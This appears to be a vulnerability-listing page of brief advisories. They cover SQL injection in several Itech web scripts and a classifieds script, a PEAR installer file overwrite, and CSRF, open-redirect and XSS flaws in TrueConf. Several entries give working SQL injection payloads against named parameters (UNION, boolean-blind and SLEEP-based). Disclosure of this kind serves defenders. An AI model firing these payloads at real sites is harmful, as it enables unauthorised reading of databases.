An SQL Injection vulnerability in Itech Multi Vendor Script 6.49 allows attackers to read arbitrary data from the database. The vulnerability can be exploited by sending a malicious payload to the 'pl' parameter of the 'product-list.php' page.
An SQL Injection vulnerability in Itech Freelancer Script v5.13 allows attackers to read arbitrary data from the database. URL : http://localhost/category.php?sk=4[payload] Parameter: sk (GET) Type: UNION query Title: Generic UNION query (NULL) - 52 columns Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL
An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read arbitrary data from the database. URL : http://localhost/see_more_details.php?id=40[payload] Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 29 columns Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs
An SQL Injection vulnerability in Classifieds Script v7.27 allows attackers to read arbitrary data from the database. URL : http://localhost/subpage.php?scat=51[payload] Parameter: scat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: scat=51' AND 4941=4941 AND 'hoCP'='hoCP Type: UNION query Title: Generic UNION query (NULL) - 26 columns Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES
An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read arbitrary data from the database. URL : catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload] Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA ---
An SQL Injection vulnerability in Itech Auction Script allows attackers to read arbitrary data from the database. URL : http://locahost/mcategory.php?mcid=4[payload] Parameter: mcid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mcid=4' AND 1734=1734 AND 'Ggks'='Ggks Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: mcid=-5980' UNION ALL SELECT CONCAT(0x71706b7171,0x764646494f4c7178786f706c4b4749517349686768525865666c6b6456434c766b73755a44657777,0x7171706a71)-- XAee
An SQL Injection vulnerability in Caregiver Script allows attackers to read arbitrary administrator data from the database.
The download utility class in the Installer in PEAR Base System v1.10.1, does not validate file types and filenames after a redirect, which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.
The administration interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed via the 'redirect_url' GET parameter is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain. TrueConf also suffers from multiple stored, reflected and DOM XSS issues when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerability exists in the 'roomtype-details.php' script, which is part of the Online Hotel Booking System Pro v1.0 WordPress Plugin. An attacker can exploit this vulnerability by sending a specially crafted SQL injection payload to the 'tid' parameter in the 'roomtype-details.php' script.
Services By CQR